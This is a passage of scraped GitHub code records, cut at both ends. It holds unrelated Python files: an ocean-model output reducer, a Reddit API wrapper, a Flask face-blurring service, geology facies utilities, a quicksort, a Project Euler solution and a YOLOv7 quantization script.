flux'\n ssflux[:,:,:] = SSFX\n \n elif only_time_3D == 1: \n SSFX,counter = get_avgs_3D_time(SSFX_raw,'dS',counter) \n \n ssflux = ncid.createVariable('ssflux','f8',('dt','dx4','dy4',))\n ssflux.long_name = 'salt flux'\n ssflux[:,:,:] = SSFX\n \nif incl_Cs_r == 1:\n Cs_r = ncid.createVariable('Cs_r','f8',('dz1',))\n Cs_r.long_name = 'stretching on rho points'\n Cs_r[:] = ds['Cs_r'][:]\n \n \nif incl_Cs_w == 1:\n Cs_w = ncid.createVariable('Cs_w','f8',('dz2',))\n Cs_w.long_name = 'stretching on w points'\n Cs_w[:] = ds['Cs_w'][:]\n\nif incl_dept == 1:\n h = ncid.createVariable('h','f8',('hdx','hdy',))\n h.long_name = 'salt flux'\n h[:,:] = ds['h'][:,:]\n\n\nncid.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"thorbjornmoeUiB/ROMS_initialization","sub_path":"Scripts_for_Iceland_Ideal/ReduceOutput.py","file_name":"ReduceOutput.py","file_ext":"py","file_size_in_byte":19001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20752926369","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nfrom spikeval.module import ModMetricFranke, ModuleExecutionError\nfrom .models.result import ResultFranke\n\n__author__ = \"pmeier82\"\n__all__ = [\"ModuleFranke\"]\n\n\ndef toint(val):\n # if type(val) == type(\"\"):\n res = int(float(val))\n return res\n\n\nclass ModuleFranke(ModMetricFranke):\n \"\"\"spikeval module for the franke metric\"\"\"\n\n # RESULT_TYPES\n # MRTable, # res_table - this is what we will save!\n # MRTable, # similarity_matrix\n # MRTable, # shift_matrix\n # MRTable, # sp.atleast_2d(delta_shift)\n # MRDict, # alignment\n # MRDict, # O\n # MRTable, # spike_no_assignment_matrix\n # MRDict, # EL\n # MRDict, # GL\n # MRTable, # sp.atleast_2d(TP)\n # MRTable, # sp.atleast_2d(TPO)\n # MRTable, # sp.atleast_2d(FPA)\n # MRTable, # sp.atleast_2d(FPAO)\n # MRTable, # sp.atleast_2d(FN)\n # MRTable, # sp.atleast_2d(FNO)\n # MRTable, # sp.atleast_2d(FP)\n # MRTable, # sp.atleast_2d(u_k2f)\n # MRTable, # sp.atleast_2d(u_f2k)\n\n def save(self, mod, ana):\n \"\"\"save django result entities\"\"\"\n\n # check for results\n if self._stage != 3:\n raise ModuleExecutionError(\"save initiated when module was not finalised!\")\n\n # result saving\n for row in self.result[0].value:\n res_entity = ResultFranke(analysis=ana, module=mod)\n res_entity.unit_gt = row[0]\n res_entity.unit_an = row[1]\n res_entity.KS = toint(row[2])\n res_entity.KSO = toint(row[3])\n res_entity.FS = toint(row[4])\n res_entity.TP = toint(row[5])\n res_entity.TPO = toint(row[6])\n res_entity.FPA = toint(row[7])\n res_entity.FPAE = toint(row[8])\n res_entity.FPAO = toint(row[9])\n res_entity.FPAOE = toint(row[10])\n res_entity.FN = toint(row[11])\n res_entity.FNO = toint(row[12])\n res_entity.FP = toint(row[13])\n res_entity.save()\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"pmeier82-zz/django-spikeval-franke","sub_path":"djspikeval_franke/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18142800425","text":"#!/usr/bin/env python3\n\nimport collections\nimport functools\n\n\nDIGITS = tuple(range(10))\nDIGIT_COUNTS = collections.Counter(DIGITS) + collections.Counter(DIGITS)\nFACTORIAL = [1, 1, 2, 6, 24, 120, 720, 5040, 40320, 362880, 3628800]\n\n\n@functools.lru_cache(maxsize=None)\ndef multinomial(*args):\n n = sum(args)\n r = FACTORIAL[n]\n for k in args:\n r //= FACTORIAL[k]\n return r\n\n\n# even_digits are the digits occupying 10^0, 10^2, ..., 10^18.\ndef count_arrangements(even_digits):\n even_digit_counts = collections.Counter(even_digits)\n odd_digit_counts = DIGIT_COUNTS - even_digit_counts\n even_digit_arrangements = multinomial(*sorted(even_digit_counts.values()))\n odd_digit_arrangements = multinomial(*sorted(odd_digit_counts.values()))\n # The 10^19 digit can't be 0.\n if odd_digit_counts[0] > 0:\n odd_digit_counts[0] -= 1\n odd_digit_arrangements -= multinomial(*sorted(odd_digit_counts.values()))\n return even_digit_arrangements * odd_digit_arrangements\n\n\ndef search(current_digits, current_sum, remaining_digit_count, target_sum, pool):\n if remaining_digit_count == 0:\n if current_sum == target_sum:\n return count_arrangements(current_digits)\n else:\n return 0\n if remaining_digit_count > len(pool) * 2:\n return 0\n d = pool[0]\n pool = pool[1:]\n result = search(\n current_digits, current_sum, remaining_digit_count, target_sum, pool\n )\n result += search(\n current_digits + [d],\n current_sum + d,\n remaining_digit_count - 1,\n target_sum,\n pool,\n )\n if remaining_digit_count > 1:\n result += search(\n current_digits + [d, d],\n current_sum + d * 2,\n remaining_digit_count - 2,\n target_sum,\n pool,\n )\n return result\n\n\ndef main():\n result = 0\n for even_digits_sum in (23, 34, 45, 56, 67):\n result += search([], 0, 10, even_digits_sum, DIGITS)\n print(result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zmwangx/Project-Euler","sub_path":"491/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20230444869","text":"import json\nimport requests\nimport warnings\nfrom datetime import datetime, timedelta\nfrom collections.abc import Iterable\n\nfrom .containers import RedditPost\n\n\nclass RedditAPI(object):\n \"\"\"\n Simple wrapper for some Reddit API.\n See https://www.reddit.com/dev/api\n\n NOTE: If you're using this service outside the code in github.com/timberhill/reddy, please use your own API credentials.\n\n client_id, str: Reddit API client ID, optional\n\n secret, str: Reddit API client secret, optional\n \"\"\"\n def __init__(self, client_id=None, secret=None):\n self._access_token = None\n self._access_token_deadline = None\n\n self.authenticate(client_id, secret)\n\n\n def _headers(self):\n header = { \"User-Agent\": \"python:reddy:v0.1 (by /u/timberhilly)\" }\n if self._access_token is not None:\n header[\"Authorization\"] = f\"bearer {self._access_token}\"\n\n return header\n\n\n def authenticate(self, client_id=None, secret=None, scope=\"read\"):\n \"\"\"\n OAuth2, see https://github.com/reddit-archive/reddit/wiki/OAuth2\n\n NOTE: If you're using this service outside the code in github.com/timberhill/reddy, please use your own API credentials.\n\n client_id, str: Reddit API client ID, optional\n\n secret, str: Reddit API client secret, optional\n\n scope, str: API scope, default: \"read\"\n \"\"\"\n if client_id is None or secret is None:\n from cryptography.fernet import Fernet\n with \\\n open(\"../modules/bin/62608e08adc29a8d6dbc9754e659f125\", \"rb\") as a, \\\n open(\"../modules/bin/3c6e0b8a9c15224a8228b9a98ca1531d\", \"rb\") as b, \\\n open(\"../modules/bin/5ebe2294ecd0e0f08eab7690d2a6ee69\", \"rb\") as c:\n f = Fernet(b.read()[4:-3])\n ab, cb = f.decrypt(a.read()[4:-3]), f.decrypt(c.read()[4:-3])\n \n # following this example:\n # https://github.com/reddit-archive/reddit/wiki/OAuth2-Python-Example\n client_id = client_id if client_id is not None else ab.decode(\"utf-8\")\n secret = secret if secret is not None else cb.decode(\"utf-8\")\n client_auth = requests.auth.HTTPBasicAuth(client_id, secret)\n post_data = {\n \"grant_type\": \"client_credentials\",\n \"user\": client_id, \n \"password\": secret, \n \"scope\": scope,\n \"redirect_uri\": \"https://github.com/timberhill/reddy\"\n }\n\n response = requests.post(\n \"https://ssl.reddit.com/api/v1/access_token\",\n auth=client_auth,\n data=post_data,\n headers=self._headers()\n )\n \n response_dictionary = json.loads(response.content)\n if \"access_token\" in response_dictionary:\n self._access_token = response_dictionary[\"access_token\"]\n self._access_token_deadline = \\\n datetime.utcnow() \\\n + timedelta(seconds=response_dictionary[\"expires_in\"])\n else:\n raise KeyError(\"'access_token' was not returned by the server.\")\n\n\n def verify_authentication(self):\n time_now = datetime.utcnow()\n if time_now >= self._access_token_deadline:\n # token expired, get a new one\n self.authenticate()\n\n\n def _validate_paging_arguments(self, before, after, limit):\n if before is not None and after is not None:\n raise ValueError(\"Please specify either 'before' or 'after', not both.\")\n\n if limit < 1:\n warnings.warn(f\"Silly value encountered in parameter 'limit' ({limit}), setting it to 1.\")\n limit = 1\n \n if limit > 100:\n warnings.warn(f\"Reddit API does not return more than 100 posts, but 'limit' was set to {limit}, using value of 100 instead.\")\n limit = 100\n \n return before, after, limit\n\n\n def new_posts(self, subreddit, limit=100, before=None, after=None, count=None):\n \"\"\"\n Returns posts sorted by new.\n\n subreddit, str: name of the subreddit.\n\n before, str: ID of the previous page\n\n after, str: ID of the next page\n\n limit, int: number of posts to return (1-100)\n \"\"\"\n self.verify_authentication()\n before, after, limit = self._validate_paging_arguments(before, after, limit)\n base_url = f\"https://oauth.reddit.com/r/{subreddit}/new\"\n \n response = requests.get(base_url, dict(\n before=before,\n after=after,\n limit=limit,\n count=count,\n ), headers=self._headers())\n\n response.raise_for_status()\n response_dictionary = json.loads(response.content)\n posts = [RedditPost.from_json(post[\"data\"]) for post in response_dictionary[\"data\"][\"children\"]]\n \n return posts, response_dictionary[\"data\"][\"before\"], response_dictionary[\"data\"][\"after\"]\n\n\n def search(self, subreddit, query, limit=100, before=None, after=None, count=None):\n \"\"\"\n Search API client.\n\n Can be used to load all \n\n subreddit, str: name of the subreddit.\n\n query, str: search query\n\n before, str: ID of the previous page\n\n after, str: ID of the next page\n\n limit, int: number of posts to return (1-100)\n \"\"\"\n self.verify_authentication()\n before, after, limit = self._validate_paging_arguments(before, after, limit)\n base_url = f\"https://oauth.reddit.com/r/{subreddit}/search\"\n \n response = requests.get(base_url, dict(\n q=query,\n sort=\"new\",\n syntax=\"cloudsearch\",\n t=\"all\",\n raw_json=1,\n before=before,\n after=after,\n limit=limit,\n count=count,\n ), headers=self._headers())\n\n response.raise_for_status()\n response_dictionary = json.loads(response.content)\n posts = [RedditPost.from_json(post[\"data\"]) for post in response_dictionary[\"data\"][\"children\"]]\n return posts, before, after\n \n\n def info(self, subreddit, item, url=None):\n \"\"\"\n Retrieve info on a post/comment/subreddit, see https://www.reddit.com/dev/api/#GET_api_info\n\n Fullnames info: https://www.reddit.com/dev/api/#fullnames (subreddits start with 't3_')\n\n subreddit, str: name of the subreddit.\n\n item, str/list: a comma-separated list of thing fullnames\n\n url, str: a valid URL\n \"\"\"\n self.verify_authentication()\n \n if isinstance(item, Iterable):\n item = \",\".join(item)\n\n if len(item.split(\",\")) > 100 or len(item.split(\",\")) == 0:\n raise ValueError(\"Reddit API /r/[subreddit]/api/info can only return between 0 and 100 items per request.\")\n\n base_url = f\"https://oauth.reddit.com/r/{subreddit}/api/info\"\n response = requests.get(base_url, dict(\n id=item,\n url=url\n ), headers=self._headers())\n\n response.raise_for_status()\n response_dictionary = json.loads(response.content)\n\n posts = [RedditPost.from_json(post[\"data\"]) for post in response_dictionary[\"data\"][\"children\"]]\n return posts","repo_name":"timberhill/reddy","sub_path":"modules/reddit_api.py","file_name":"reddit_api.py","file_ext":"py","file_size_in_byte":7248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23856459997","text":"from flask import Flask, request, Response, jsonify\nfrom flask_cors import CORS\nfrom flask_sock import Sock\nimport base64\nimport cv2\nimport numpy as np\nimport json\n\napp = Flask(__name__)\nCORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\nsock = Sock(app)\n\nface_detector = cv2.FaceDetectorYN_create(\n \"data/face_detection_yunet_2022mar.onnx\",\n \"\",\n (0, 0), # input size\n 0.4, # confidence threshold\n 0.1 # NMS threshold\n)\n\ndef blur_image(image_data, score_threshold=0.4):\n \"\"\" Receives and outputs base64\"\"\"\n image_data = base64.b64decode(image_data.split(\",\")[1])\n\n face_detector.setScoreThreshold(score_threshold)\n img = cv2.imdecode(np.frombuffer(image_data, np.uint8), cv2.IMREAD_COLOR)\n\n channels = 1 if len(img.shape) == 2 else img.shape[2]\n if channels == 1:\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n if channels == 4:\n img = cv2.cvtColor(img, cv2.COLOR_BGRA2BGR)\n\n height, width, _ = img.shape\n face_detector.setInputSize((width, height))\n\n _, faces = face_detector.detect(img)\n faces = faces if faces is not None else []\n \n # Blur faces\n for face in faces:\n box = list(map(int, face[:4]))\n x, y, w, h = box\n x = max(0, x)\n y = max(0, y)\n img[y:y+h, x:x+w] = cv2.blur(img[y:y+h, x:x+w], (50, 50), 0)\n\n buf = cv2.imencode('.jpg', img)[1]\n b64 = base64.b64encode(buf).decode()\n return b64\n\n@app.route(\"/upload\", methods=[\"POST\"])\ndef upload():\n image_data = request.json[\"image\"]\n thresh = request.json[\"score_threshold\"]\n if not image_data:\n return Response(\n \"No image given\",\n status=400,\n )\n \n b64 = blur_image(image_data, thresh)\n return jsonify({\"img\": b64})\n\n@sock.route(\"/blur_ws\")\ndef blur_ws(sock):\n while True:\n data = json.loads(sock.receive())\n image_data = data[\"image\"]\n thresh = data[\"score_threshold\"]\n\n if not image_data:\n return Response(\n \"No image given\",\n status=400,\n )\n\n b64 = blur_image(image_data, thresh)\n sock.send(b64)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5001, threaded=True, use_reloader=False)\n ","repo_name":"scherjo/blur","sub_path":"blur-flask-app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37135685354","text":"from csv import DictWriter, DictReader\nfrom copy import deepcopy\nfrom collections import Counter\n\ncode_to_name = {\n \"1.1\": \"Alluvial_Fan\",\n \"1.2\": \"Fluvial_Channel\",\n \"1.3\": \"Fluvial_Point_Bar\",\n \"1.4\": \"Levee\",\n \"1.5\": \"Crevasse_Splay\",\n \"1.6\": \"Fluvial_Floodplain\",\n \"2.1\": \"Progradational_Lacustrine_Delta\",\n \"2.2\": \"Lacustrine_Fan_Delta\",\n \"2.3\": \"Progradational_Lacustrine_Shoreface\",\n \"2.4\": \"Transgressive_Lacustrine_Shoreface\",\n \"2.5\": \"Aggradational_Lacustrine_Shoreface\",\n \"2.6\": \"Lacustrine_Offshore_Transition\",\n \"2.7\": \"Lacustrine_Shelf\",\n \"3.1\": \"Proximal_Sub-Lacustrine_Fan\",\n \"3.2\": \"Distal_Sub-Lacustrine_Fan\",\n \"3.3\": \"Lacustrine_Turbidite\",\n \"3.4\": \"Distal_Lacustrine_Turbidites\",\n \"3.5\": \"Lacustrine_Deepwater\",\n \"4.1\": \"Marine_Delta\",\n \"4.2\": \"Marine_Fan_Delta\",\n \"4.3\": \"Tidal_Channel_And_Sand_Flat\",\n \"4.4\": \"Sandy_Tidal_Flat\",\n \"4.5\": \"Mixed_Tidal_Flat\",\n \"4.6\": \"Muddy_Tidal_Flat\",\n \"4.7\": \"Lagoon\",\n \"5.1\": \"Progradational_Marine_Shoreface\",\n \"5.2\": \"Transgressive_Marine_Shoreface\",\n \"5.3\": \"Aggradational_Marine_Shoreface\",\n \"5.4\": \"Marine_Offshore_Transition\",\n \"5.5\": \"Marine_Shelf\",\n \"6.1\": \"Proximal_Submarine_Fan\",\n \"6.2\": \"Distal_Submarine_Fan\",\n \"6.3\": \"Marine_Turbidite\",\n \"6.4\": \"Distal_Marine_Turbidites\",\n \"6.5\": \"Marine_Deepwater\"\n}\n\ngroups = {\n \"Fluvial\": [\"1.1\", \"1.2\", \"1.3\", \"1.4\", \"1.5\", \"1.6\"],\n \"Shallow_Lacustrine\": [\"2.1\", \"2.2\", \"2.3\", \"2.4\", \"2.5\", \"2.6\", \"2.7\"],\n \"Deep_Lacustrine\": [\"3.1\", \"3.2\", \"3.3\", \"3.4\", \"3.5\"],\n \"Marginal_Marine\": [\"4.1\", \"4.2\", \"4.3\", \"4.4\", \"4.5\", \"4.6\", \"4.7\"],\n \"Shallow_Marine\": [\"5.1\", \"5.2\", \"5.3\", \"5.4\", \"5.5\"],\n \"Deep_Marine\": [\"6.1\", \"6.2\", \"6.3\", \"6.4\", \"6.5\"]\n}\n\n\ndef convert_name_to_number(data):\n tmp = deepcopy(code_to_name)\n tmp.update({\"0\": \"unknown\"})\n for row in data:\n for key, value in row.items():\n if value in tmp.values():\n code = list(tmp.keys())[list(tmp.values()).index(value)]\n row.update({key: code})\n\n\ndef remove_duplicate(arr):\n arr.sort()\n i = 0\n while i < len(arr) - 1:\n if arr[i] == arr[i + 1]:\n arr.pop(i)\n i -= 1\n i += 1\n return arr\n\n\ndef map_core_depofacies_code_to_name(code):\n try:\n return code_to_name[code]\n except KeyError:\n return None\n\n\ndef convert_string_to_array(string):\n return string[1:-1].split(\", \") if string != '[]' else []\n\n\ndef get_group_depofacies(name):\n try:\n return groups[name]\n except KeyError:\n return None\n\n\ndef get_group_name(facy_name):\n for key, item in code_to_name.items():\n if item == facy_name:\n facy_code = key\n\n for key, item in groups.items():\n if facy_code in item:\n return key\n\n\ndef get_max_by_key(key, data):\n lst = []\n max = 0\n for item in data:\n if int(item[key]) > max:\n max = item[key]\n for item in data:\n if int(item[key]) == max:\n lst.append(item)\n return lst\n\n\ndef update_row_group(group_name, row, point):\n for depofacy in get_group_depofacies(group_name):\n name = map_core_depofacies_code_to_name(depofacy)\n if int(row[name]) > 0:\n if point == \"x\":\n row.update({name: 0})\n else:\n row.update({name: handle_addition(int(row[name]) + point)})\n return row\n\n\ndef convert_unit_by_unit(data):\n lst = []\n lithos = []\n depos = []\n for i in range(0, len(data)):\n if data[i][\"Special_lithology\"] != \"-9999\":\n lithos.append(float(data[i][\"Special_lithology\"]))\n if data[i][\"Core_depofacies\"] != \"-9999\":\n depos.append((float(data[i][\"Core_depofacies\"])))\n if data[i][\"Boundary_flag\"] == \"1\":\n final_litho = deepcopy(remove_duplicate(lithos))\n final_depos = deepcopy(remove_duplicate(depos))\n data[i].update({\"Special_lithology\": final_litho, \"Core_depofacies\": final_depos})\n lst.append(data[i])\n lithos.clear()\n depos.clear()\n\n return lst\n\n\ndef contain_special_lithology(litho):\n if litho == \"[]\" or not litho:\n return False\n return True\n\n\ndef get_key(lst, i):\n return [key for key in lst[i].keys()][0]\n\n\ndef calculate_uncertainty(row):\n if row[\"Most\"] == \"unknown\" or not row[\"Most\"]:\n return 1\n\n if row[\"Second_Most\"] and row[\"Second_Most\"] != \"unknown\" and float(row[row[\"Most\"]]) - float(\n row[row[\"Second_Most\"]]) < 0.1:\n return 1\n\n if row[\"Most\"] and float(row[row[\"Most\"]]) < 0.3:\n return 1\n\n return 0\n\n\ndef export_final(initial_file, filename, data, headers):\n if not headers:\n headers = data[0].keys()\n\n keys = [\"Most\", \"Second_Most\", \"Third_Most\"]\n\n headers.append(\"Sum\")\n headers.append(\"Uncertainty_flag\")\n headers.extend(keys)\n\n for row in data:\n lst = []\n for key, value in code_to_name.items():\n if int(row[value]) != 0:\n lst.append({value: int(row[value])})\n lst = sorted(lst, key=lambda it: it[[key for key in it.keys()][0]], reverse=True)\n for i in range(len(lst) - 1):\n if lst[i][get_key(lst, i)] == lst[i + 1][get_key(lst, i + 1)]:\n lst[i][get_key(lst, i)] = \"unknown\"\n lst[i + 1][get_key(lst, i + 1)] = \"unknown\"\n\n for i in range(len(keys)):\n if len(lst) > i:\n name = [key for key in lst[i].keys()][0]\n if lst[i][name] == \"unknown\" or contain_special_lithology(row[\"Special_lithology\"]):\n row.update({keys[i]: \"unknown\"})\n else:\n row.update({keys[i]: name})\n else:\n row.update({keys[i]: \"\"})\n\n if i == 2:\n break\n\n for row in data:\n row.update({\"Uncertainty_flag\": calculate_uncertainty(row)})\n\n for row in data:\n total = 0\n for key, value in code_to_name.items():\n total += int(row[value])\n row.update({\"Sum\": total})\n\n for row in data:\n for key, value in code_to_name.items():\n if int(row[\"Sum\"]) != 0:\n row.update({value: int(row[value]) / int(row[\"Sum\"])})\n\n convert_name_to_number(data)\n\n with open(initial_file) as i_file:\n csv_reader = DictReader(i_file)\n initial_data = list(csv_reader)\n\n with open(filename, \"w\") as o_file:\n csv_writer = DictWriter(o_file, fieldnames=headers)\n csv_writer.writeheader()\n for row in initial_data:\n for header in headers:\n if header not in row:\n row.update({header: data[int(row[\"Unit_index\"])][header]})\n csv_writer.writerow(row)\n\n\ndef export_to_csv(filename, data, headers):\n if not headers:\n headers = data[0].keys()\n with open(filename, \"w\") as o_file:\n csv_writer = DictWriter(o_file, fieldnames=headers)\n csv_writer.writeheader()\n for row in data:\n csv_writer.writerow(row)\n\n\ndef pick_most(data):\n if len(data) == 0:\n return None\n return sorted(data, key=Counter(data).get, reverse=True)[0]\n\n\ndef handle_addition(point):\n if int(point) <= 0:\n return 0\n return int(point)\n","repo_name":"tranhieu956230/ai_i2g","sub_path":"utilites/utils_func.py","file_name":"utils_func.py","file_ext":"py","file_size_in_byte":7335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35422558804","text":"# Quick sort implementation\n\ndef partition(arr, left, right):\n pivot = left\n\n while left < right:\n while (arr[left]) <= arr[pivot]:\n left += 1\n \n while arr[right] > arr[pivot]:\n right -= 1\n\n if left < right:\n temp = arr[left]\n arr[left] = arr[right]\n arr[right] = temp\n\n temp = arr[pivot]\n arr[pivot] = arr[right]\n arr[right] = temp\n \n return right\n\ndef quicksort(arr, left, right):\n if right - left <= 0:\n return\n\n index = partition(arr, left, right)\n\n quicksort(arr, left, index - 1)\n quicksort(arr, index + 1, right)\n\n\narr = [34, 14, 432, 14,124]\n(quicksort(arr, 0, 4))\nprint(arr)\n","repo_name":"ListowelAdolwin/dsa","sub_path":"sorting/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21163140606","text":"pizza = {\n\t'crust': 'thick',\n\t'toppings': ['mushroom', 'extra cheese'],\n}\n\n#概述点的比萨\nprint('You ordered a ' + pizza['crust'] + '-crust pizza ' +\n\t'with the following toppings:')\nfor topping in pizza['toppings']:\n\tprint('\\t' + topping)\n\t\ndef make_pizza(size, *toppings):\n\t\"\"\"概述要制作的比萨\"\"\"\n\tprint('\\nMake a ' + str(size) +\n\t\t'-inch pizza with the folling toppings:')\n\tfor topping in toppings:\n\t\tprint('-' + topping)\n\nmake_pizza(16, 'peperoni')\nmake_pizza(12, 'mushroom', 'green peppers', 'extra cheese')","repo_name":"LJZSR/python_work","sub_path":"pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44433566538","text":"import torch\nimport logging\nimport os\nimport test\nimport numpy as np\nfrom models.experimental import attempt_load\nfrom utils.datasets import create_dataloader\nfrom utils.general import check_img_size, set_logging, colorstr, increment_path\nimport yaml\nfrom pathlib import Path\nimport argparse\nfrom tqdm import tqdm\nfrom utils.loss import ComputeLoss\n# Define color codes\nGREEN = '\\033[32m'\nRED = '\\033[31m'\nRESET = '\\033[0m'\n\nlogger = logging.getLogger(__name__)\n\nclass Quantization:\n\n def __init__(self, pretrained_weight, backend = 'x86'):\n from models.experimental import Q_model\n\n self.device = torch.device(\"cpu\")\n self.pretrained_weight = pretrained_weight\n self.model_fp32 = attempt_load(weights=self.pretrained_weight)\n self.model = Q_model(self.model_fp32)\n self.backend = backend # 'x86' or 'qnnpack'\n logging.info(f\"{GREEN}Quantization Backend: {self.backend}{RESET}\")\n\n def quantize(self, method, dataloader=None):\n\n self.method = method\n\n if self.method == 'psq': # Post static quantization\n self._post_static_quantization(dataloader)\n\n elif self.method == 'qat': # Quantization Aware Training\n pass\n\n else:\n raise ValueError(\"Quantization method should be 'psq' or 'qat'\")\n\n def set_q_config(self):\n\n if self.backend == 'x86': # for x86_64 \n q_config = torch.quantization.get_default_qconfig(\"x86\")\n elif self.backend == 'qnnpack': # for aarch \n q_config = torch.quantization.get_default_qconfig(\"qnnpack\")\n self.model.qconfig = q_config\n\n def load_state_dict(self, weights):\n\n self.set_q_config()\n torch.quantization.prepare(self.model, inplace=True)\n torch.quantization.convert(self.model, inplace=True)\n self.model.load_state_dict(torch.load(weights))\n logging.info(f\"{GREEN}Weights are loaded.{RESET}\")\n\n def _post_static_quantization(self, dataloader):\n\n self.set_q_config()\n self.model.to(self.device).eval()\n\n torch.quantization.prepare(self.model, inplace=True)\n logging.info(GREEN+\"Prepared Post Static Quantization\"+RESET)\n\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n self.model.to(self.device)\n s = f\"Calibrating on {self.device}...\"\n pbar = tqdm(enumerate(dataloader), total=nb, desc=s)\n for i, (imgs, targets, paths, _) in pbar:\n\n imgs = imgs.to(self.device, non_blocking=True).float() / 255.0\n\n with torch.no_grad():\n pred = self.model(imgs)\n\n if opt.debug == True:\n break\n torch.quantization.convert(self.model.to(\"cpu\"), inplace=True)\n logging.info(GREEN+\"Post Static Quantization is Completed!\"+RESET)\n\n self.save()\n\n def save(self):\n \n self.save_path = self.pretrained_weight.replace(\".pt\", \"_\"+ self.method + \".pt\")\n torch.save(self.model.state_dict(), self.save_path)\n logging.info(f'{GREEN}Saved at {self.save_path}\\nModel Size (MB)\\n FP16: {os.path.getsize(self.pretrained_weight)/1e6}\\n INT8: {os.path.getsize(self.save_path)/1e6}{RESET}')\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--weights', type=str, default='runs/train/yolov7/weights/best.pt', help='weights path')\n parser.add_argument('--data', type=str, default='data/VisDrone.yaml', help='data.yaml path')\n parser.add_argument('--batch-size', type=int, default=16, help='total batch size for all GPUs')\n parser.add_argument('--epochs', type=int, default=16, help='total batch size for all GPUs')\n parser.add_argument('--hyp', type=str, default='data/hyp.scratch.p5.yaml', help='hyperparameters path')\n parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')\n parser.add_argument('--img-size', nargs='+', type=int, default=[640, 640], help='[train, test] image sizes')\n parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')\n parser.add_argument('--rect', action='store_true', help='rectangular training')\n parser.add_argument('--workers', type=int, default=8, help='maximum number of dataloader workers')\n parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')\n parser.add_argument('--quad', action='store_true', help='quad dataloader')\n parser.add_argument('--v5-metric', action='store_true', help='assume maximum recall as 1.0 in AP calculation')\n parser.add_argument('--evolve', action='store_true', help='evolve hyperparameters')\n parser.add_argument('--name', default='exp', help='save to project/name')\n parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')\n parser.add_argument('--project', default='runs/train', help='save to project/name')\n parser.add_argument('--debug', type=bool, default=False, help='debugging mode')\n\n opt = parser.parse_args()\n print(opt)\n # Load parmeteres\n opt.world_size = int(os.environ['WORLD_SIZE']) if 'WORLD_SIZE' in os.environ else 1\n opt.global_rank = int(os.environ['RANK']) if 'RANK' in os.environ else -1\n set_logging(opt.global_rank)\n\n with open(opt.data) as f:\n data_dict = yaml.load(f, Loader=yaml.SafeLoader) # data dict\n train_path = data_dict['train']\n test_path = data_dict['val']\n \n opt.save_dir = increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok | opt.evolve) # increment run\n save_dir, epochs, batch_size, weights, rank= \\\n Path(opt.save_dir), opt.epochs, opt.batch_size, opt.weights, opt.global_rank\n \n opt.total_batch_size = opt.batch_size\n total_batch_size = opt.total_batch_size\n \n # Hyperparameters\n with open(opt.hyp) as f:\n hyp = yaml.load(f, Loader=yaml.SafeLoader) # load hyps \n\n # Load a Pretrained Model and Create a Quantized Model\n device = torch.device(\"cpu\")\n nc = 1 if opt.single_cls else int(data_dict['nc']) # number of classes\n\n Q = Quantization(weights)\n model = attempt_load(weights, map_location=device)\n\n # Trainloader\n gs = max(int(model.stride.max()), 32) # grid size (max stride)\n nl = model.model[-1].nl # number of detection layers (used for scaling hyp['obj'])\n imgsz, imgsz_test = [check_img_size(x, gs) for x in opt.img_size] # verify imgsz are gs-multiples\n\n dataloader, dataset = create_dataloader(train_path, imgsz, batch_size, gs, opt,\n hyp=hyp, augment=True, cache=opt.cache_images, rect=opt.rect, rank=rank,\n world_size=opt.world_size, workers=opt.workers,\n image_weights=opt.image_weights, quad=opt.quad, prefix=colorstr('train: '))\n mlc = np.concatenate(dataset.labels, 0)[:, 0].max() # max label class\n nb = len(dataloader) # number of batches\n\n testloader = create_dataloader(test_path, imgsz_test, batch_size * 2, gs, opt, # testloader\n hyp=hyp, cache=opt.cache_images and not opt.notest, rect=True, rank=-1,\n world_size=opt.world_size, workers=opt.workers,\n pad=0.5, prefix=colorstr('val: '))[0]\n\n logger.info(('\\n' + '%10s' * 8) % ('Epoch', 'gpu_mem', 'box', 'obj', 'cls', 'total', 'labels', 'img_size'))\n assert mlc < nc, 'Label class %g exceeds nc=%g in %s. Possible class labels are 0-%g' % (mlc, nc, opt.data, nc - 1)\n compute_loss = ComputeLoss(model) # init loss class\n\n # Quantization\n Q.quantize('psq', dataloader= dataloader)\n \n Q2 = Quantization(pretrained_weight=weights)\n Q2.load_state_dict('runs/train/yolov7/weights/best_psq.pt')\n \n # print(Q.model)\n\n # print(type(Q.model))\n\n # #Q.model.eval()\n\n # random_input = np.random.random((1,3,640,640)).astype(np.float32)\n\n # Q.model(torch.Tensor(random_input))","repo_name":"vivekdevre/YOLOv7_VisDrone","sub_path":"quantize.py","file_name":"quantize.py","file_ext":"py","file_size_in_byte":8062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"71818284008","text":"class 